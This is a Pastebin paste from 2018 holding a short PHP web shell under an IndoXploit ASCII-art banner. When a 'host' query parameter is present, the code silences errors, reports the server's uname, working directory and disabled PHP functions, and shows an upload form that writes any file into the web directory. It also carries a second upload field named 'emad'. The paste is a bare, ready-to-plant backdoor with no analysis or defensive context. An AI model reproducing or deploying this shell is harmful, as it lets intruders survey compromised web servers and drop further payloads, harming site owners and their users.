Advertisement
Sl4ckerc0de

Untitled

Jun 6th, 2018
19,665
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.35 KB | None | 0 0
  1. <center>
  2. <header>
  3. <pre>
  4. ___________________________
  5. < root@indoxploit:~# w00t??? >
  6. ---------------------------
  7. \ , ,
  8. \ /( )`
  9. \ \ \___ / |
  10. /- _ `-/ '
  11. (/\/ \ \ /\
  12. / / | ` \
  13. O O ) / |
  14. `-^--'`< '
  15. (_.) _ ) /
  16. `.___/` /
  17. `-----' /
  18. <----. __ / __ \
  19. <----|====O)))==) \) /====>
  20. <----' `--' `.__,' \
  21. | |
  22. \ /
  23. ______( (_ / \______
  24. ,' ,-----' | \
  25. `--{__________) \/
  26. </pre>
  27. </header>
  28. <?php
  29. error_reporting(0);
  30. if(isset($_GET[host]))
  31. {
  32. echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]<br>";
  33. echo "<font color=#FFFFFF>[pwd]".getcwd()."[/pwd]<br>";
  34. print "\n";$disable_functions = @ini_get("disable_functions");
  35. echo "DisablePHP=".$disable_functions; print "<br>";
  36. echo"<form method=post enctype=multipart/form-data>";
  37. echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
  38. if($_POST["v"]==up)
  39. { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Ok</b>-->".$_FILES["f"]["name"];}else{echo"<b>error";}}
  40. { if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo"<b></b>-->".$_FILES["emad"]["name"];}else{echo"<b>";}}} ?>
  41. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement